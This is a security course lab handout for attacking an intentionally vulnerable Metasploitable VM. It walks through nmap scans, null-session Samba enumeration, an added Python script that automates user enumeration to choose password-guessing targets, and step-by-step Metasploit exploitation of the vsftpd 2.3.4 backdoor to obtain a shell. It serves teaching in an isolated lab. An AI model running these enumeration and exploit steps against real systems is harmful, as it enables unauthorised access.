Metasploit and Basic Exploitation

Prerequisites:

  1. Kali Linux Virtual Machine
  2. Metasploitable Virtual Machine

Objectives:
The main purpose of this week’s exercise is to get started with Metasploit and to understand how to
wield it appropriately for basic exploits.

Call for Help:
Do your best to try the tasks below. If you’re confused or need help, feel free to email or text me at any
point and I will gladly try to help you. If you’re having an issue, chances are other people are as well,
and I can update the instructions/comments or add content as necessary.

Tasks:
Setup

  1. You’ll need both Kali and Metasploitable running simultaneously, each in its own virtual
    machine. This is close to the situation of an adversary on a local network with a vulnerable
    asset.
  2. For the two VMs to reach each other, put both on the same NAT network or the same host-only
    (private) network. Note that on a host-only network they will not be able to talk to the outside
    world. Do not attach Metasploitable to a bridged adapter: it is intentionally vulnerable and
    should never be reachable from a real network.

Intro:

  1. Review the following sections from Offensive Security’s Website
    a. Introduction
    b. Metasploit Fundamentals
    c. Information Gathering
    https://www.offensive-security.com/metasploit-unleashed/
  2. Remember, your Kali and Metasploitable virtual machines can easily be redownloaded if you
    break something. Do not be afraid to experiment.

Initial Vectors:

  1. Determine the IP address of both your Kali virtual machine and the Metasploitable virtual
    machine (ip addr on Kali, ifconfig on Metasploitable). You will need these throughout the
    exercises.
  2. Verify that you can ping from Kali to Metasploitable and from Metasploitable to Kali. This
    confirms you have connectivity between the two virtual machines.

Recon:

  1. Execute an nmap version scan against the Metasploitable VM:
    nmap -v -sV <IP Address of Target>
    What ports are open on the target host? What services does this imply might be available?
  2. Let’s see if we can determine the operating system of this host.
    What nmap command would we use to determine the running operating system?
    What is the running operating system of the metasploitable machine? Provide a screenshot.
  3. It looks like there’s a web server (port 80 is open), running on this host.
    What can we determine by visiting that website?
  4. Let’s try enumerating user accounts on the device using the nmap scripting engine. The script
    only talks to the SMB ports, so there is no need to scan all 65535 ports for it:
    nmap --script smb-enum-users -p 139,445 <IP Address of Target>
    Provide a screenshot.
  5. rpcclient is a Samba tool for calling MS-RPC functions from a Linux client.
    Samba 4.11 (late 2019, shipped in Kali releases from 2020 onward) disabled the old SMB1/NT1
    dialect on the client side by default, and the Samba 3.0.20 on Metasploitable 2 only speaks
    SMB1. If you’re running Kali 2020.1 or later, add the following line to the [global] section of
    /etc/samba/smb.conf, otherwise rpcclient will fail to negotiate a connection. Note, you must be
    root to edit this file.
    client min protocol = NT1

    A null session is a connection to a Samba or SMB server that does not require authentication
    with a password. No username or password is needed to set up the connection, and therefore it
    is called a null session. Null sessions were allowed by default on legacy systems but have been
    disabled since Windows XP SP2 and Windows Server 2003. The connection uses port 445 (or the
    older port 139), both of which are open on our target host, as we saw in the results of the port
    scan.
    Open a new terminal window and set up a null session with the Metasploitable 2 Samba server
    using the following command:
    rpcclient -U "" <target IP address>
    The -U option gives an empty (null) username, followed by the IP address of the Metasploitable
    2 VM. You will be asked for a password; just press Enter to continue (or add -N to skip the
    prompt entirely).
    Then query the server with the rpcclient command querydominfo.
    What does this tell you about the machine? How many users are there, and how many are
    available?
    Next, see what users you can find by running the command enumdomusers.
    Pick a user you enumerated. What can you tell me about that user from the queryuser
    <username> command?

  6. Software developers and hackers like to make repetitive tasks easy. Try the enum4linux
    command on the target host (it uses the same Samba client tools, so the smb.conf change from
    step 5 applies to it as well).
    What does this command do? Be detailed.
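The interactive rpcclient session in step 5 and the enum4linux wrapper in step 6 do the same thing: open a null session, list accounts, then query each one. The script below is an added example (not part of this handout, nor code from Samba or enum4linux) that drives rpcclient non-interactively with -N and -c, parses the enumdomusers output, and undoes Samba's algorithmic RID mapping (user RID = 2*uid + the "algorithmic rid base", default 1000) to recover the Unix uid behind each account. It assumes rpcclient is on PATH and, on Kali 2020 or later, that the NT1 line from step 5 is in /etc/samba/smb.conf. The sample enumdomusers output embedded in it is constructed for the offline demo, not captured from a real host.

```python
"""Script the null-session enumeration from steps 5 and 6 (added example)."""
import re
import subprocess
import sys

# Constructed sample in the format enumdomusers prints, one account per line.
# The names and RIDs are illustrative, not captured from a real host.
SAMPLE_ENUMDOMUSERS = """\
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x203e4]
user:[msfadmin] rid:[0xbb8]
"""

USER_LINE = re.compile(
    r"^user:\[(?P<name>[^\]]*)\]\s+rid:\[(?P<rid>0x[0-9A-Fa-f]+)\]$", re.M
)

ALGORITHMIC_RID_BASE = 1000  # Samba's default for "algorithmic rid base"


def parse_domusers(text):
    """Map account name -> RID (int) from enumdomusers output."""
    return {m.group("name"): int(m.group("rid"), 16) for m in USER_LINE.finditer(text)}


def rid_to_uid(rid, base=ALGORITHMIC_RID_BASE):
    """Undo Samba's algorithmic user mapping: rid = 2*uid + base.

    Returns None when the RID cannot be a user RID under this scheme
    (below the base it is a well-known RID, odd offsets are groups).
    """
    off = rid - base
    if off < 0 or off % 2:
        return None
    return off // 2


def rpc(target, *commands):
    """Run rpcclient commands over a null session and return its stdout.

    -N: never prompt for a password; -U "": empty username (null session);
    -c: run the ';'-separated commands instead of an interactive shell.
    """
    proc = subprocess.run(
        ["rpcclient", "-N", "-U", "", target, "-c", ";".join(commands)],
        capture_output=True, text=True, check=False,
    )
    if proc.returncode != 0:
        raise RuntimeError(f"rpcclient failed: {proc.stderr.strip()}")
    return proc.stdout


def enumerate_target(target):
    """querydominfo, enumdomusers, then queryuser for every account found."""
    report = {"dominfo": rpc(target, "querydominfo"), "users": {}}
    for name, rid in parse_domusers(rpc(target, "enumdomusers")).items():
        report["users"][name] = {
            "rid": rid,
            "likely_uid": rid_to_uid(rid),
            "queryuser": rpc(target, f"queryuser {name}"),
        }
    return report


if __name__ == "__main__":
    if len(sys.argv) == 2:
        rep = enumerate_target(sys.argv[1])
        print(rep["dominfo"])
        for name, info in rep["users"].items():
            print(f"{name}: rid={info['rid']:#x} uid~{info['likely_uid']}")
            print(info["queryuser"])
    else:
        # Offline demo on the constructed sample: no network access needed.
        for name, rid in parse_domusers(SAMPLE_ENUMDOMUSERS).items():
            print(f"{name}: rid={rid:#x} uid~{rid_to_uid(rid)}")
```

Run it as python3 enum_null.py <target IP> against Metasploitable; without an argument it only exercises the parser on the constructed sample. The uid recovered from the RID is what makes the account list useful: the first account with uid 1000 is the first regular user created on the box, which is a far better password-guessing target than the system accounts.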

Target/Weaponize

  1. In the earlier steps we identified an FTP server running on port 21, and the version scan
    reported it as vsftpd 2.3.4, a common FTP server.
    Read the page at the link below. What does it tell you?
    https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
    We’ll cover this in detail another time, but what does the code in the pastebin link (the diff
    of the backdoored source) tell you? Why is it vulnerable? Can you trigger the backdoor
    manually, without Metasploit?
  2. It turns out nmap has a script to help us here:
    nmap --script ftp-vsftpd-backdoor -p 21 <IP Address of Target>
    Note: https://nmap.org/nsedoc/scripts/ftp-vsftpd-backdoor.html
  3. Maybe Metasploit has a module to handle this exploitation. Inside msfconsole (started in
    the next section), run search vsftpd.

Deliver and Exploit!

  1. Start Metasploit with the command msfconsole
  2. Load the exploit with use exploit/unix/ftp/vsftpd_234_backdoor
  3. See what options are required with the show options command
  4. Set the target with set RHOSTS <IP Address of Target>
  5. Launch it with run (exploit does the same thing)
  6. When the exploit completes you will see “Command shell session 1 opened”. The session is a
    raw shell with no prompt; type the traditional Linux commands whoami and ifconfig and press
    Enter after each.
    What’s going on? What did the exploit accomplish?
  7. Recall and investigate where and how Linux traditionally stores user and password
    information. Any ideas on what can be done to find the passwords?
  8. What could be done to fix this vulnerability?

Your Turn:
You should have noticed in your nmap results that there is an IRC server running. Your mission is to
gain root-level privileges on the virtual machine through that service using Metasploit. Good luck.
Provide a screenshot of the commands executed and the Linux date/time as shown by the date command.
